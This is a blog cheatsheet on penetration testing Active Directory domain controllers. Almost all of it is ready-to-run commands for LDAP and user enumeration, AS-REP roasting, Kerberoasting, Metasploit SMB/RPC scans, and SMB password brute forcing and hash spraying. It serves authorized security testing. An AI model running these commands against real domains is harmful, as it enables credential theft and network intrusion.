Pentesting Domain Controllers Cheatsheet

In this blog post, we will share with you a comprehensive cheatsheet for pentesting those powerful and critical domain controllers. Now, I know what you're thinking: "But why, oh wise one, do we need such a guide?" Well, let me tell you, domain controllers are the repositories of your organization's most sensitive information - user credentials, group policies, and what not. And if not secured properly, they can lead to catastrophic data breaches or even system takeovers! 

So buckle up, as we explore various techniques, tools for testing the security of domain controllers. From identifying potential vulnerabilities to exploiting  them, we've got you covered with practical examples, real-life scenarios, and actionable insights. So stay tuned and prepare yourself for a rollercoaster ride through the fascinating world of pentesting!


Note: Before proceeding with pentesting any system, it is essential to have proper authorization from concerned authorities and follow ethical guidelines. Happy learning!


This is just a brief/quick guide on what and how to Pentest a domain controller without digging too deep. if you are looking for a comprehensive guide, you can refer to my ACTIVE DIRECTORY PENETRATION TESTING CHEAT SHEET - RECON & INITIAL ACCESSACTIVE DIRECTORY PENTEST CHEAT SHEET - LATERAL MOVEMENT & PERSISTENCE TECHNIQUES

DNS

dig srv domaim.com @DC_IP #Query ldap service dig +short srv _ldap._tcp.dc._msdcs.dc.domain.com @DC_IP #query Root Domain Controller dig +short a rootdc.domain.com @DC_IP

LDAP Enum

#Nmap Scan for basic info nmap -n -sV --script "ldap* and not brute" -p389,636,3268,3269 10.10.10.10 #Get Domain name ldapsearch -x -h 10.10.10.10 -s base namingcontexts ldapsearch -H ldap://10.10.10.10 -x -s base namingcontexts #Look for misconfigs - Finding ms-MCS-AdmPwd ldapsearch -x -h forest.htb.local -b 'DC=HTB,DC=LOCAL' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd #Dump Everything ldapsearch -LLL -x -H ldap://10.10.10.10 -b '' -s base '(objectclass=*)' #Dump Everything using ldeep ldeep ldap -a -d STEINS.local -s ldap://10.10.10.10 all dump

UserEnum

Objective is to gather as many valid usernames as possible, try to figure out the username format used by the organization using their email addresses or social engineering Example Name: John Smith Usernames: John.Smith, JohnS, Sjohn, SmithJ, JSmith, John.s try to figure it out and create a wordlist for yourself, you can use the below git reopo as a reference and create a list of usernames git clone https://github.com/Bhanunamikaze/Wordlists.git cd Wordlists/Usernames # User Enumeration to find Valid Usernames kerbrute userenum --dc 10.10.10.10 -d test.domain.com Common_names.txt

Find Pre-Auth Disabled Users

GetNPUsers.py DOMAIN/ -usersfile user.txt -outputfile hash.txt -dc-ip 10.10.10.10 #AD Module - Finding users with PreauthNotRequired set Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuths

Kerberoasting

#Listing users with ServicePrincialName set using AD module Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName #Get TGS Ticket Using GetUserSPNs.py sudo GetUserSPNs.py -request -dc-ip 10.10.10.10 Steins.local/mark

SMB/rpc Access

Use this script for testing SMB & RPC, this will run most common test cases on SMB rpcdump.py 10.10.10.10 -p 593
#RPC Endpoints enum via metsploit msfconsole use auxiliary/scanner/smb/pipe_auditor use auxiliary/scanner/smb/smb_lookupsid use auxiliary/scanner/dcerpc/endpoint_mapper use auxiliary/scanner/dcerpc/hidden use auxiliary/scanner/dcerpc/management use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor
set rhosts 10.10.10.10 run

SMB Bruteforcing

#Basic SMB & OS info crackmapexec smb 10.10.10.10 #List Shares crackmapexec smb 10.10.10.10 --shares #passing blank creds via smb crackmapexec smb 10.10.10.10 --shares -u '' -p '' #If the password needs to be changed smbpasswd -U username -r 10.10.10.10 #Brute forcing SMB Creds crackmapexec smb 10.10.10.10 -u users.txt -p passwords.txt #Bruteforcing SMB using hashes proxychains crackmapexec -t 15 smb 10.10.10.10 -u users -H hashes --no-bruteforce --continue-on-success


 

Bhanu Namikaze

Bhanu Namikaze is an Ethical Hacker, Security Analyst, Blogger, Web Developer and a Mechanical Engineer. He Enjoys writing articles, Blogging, Debugging Errors and Capture the Flags. Enjoy Learning; There is Nothing Like Absolute Defeat - Try and try until you Succeed.

No comments:

Post a Comment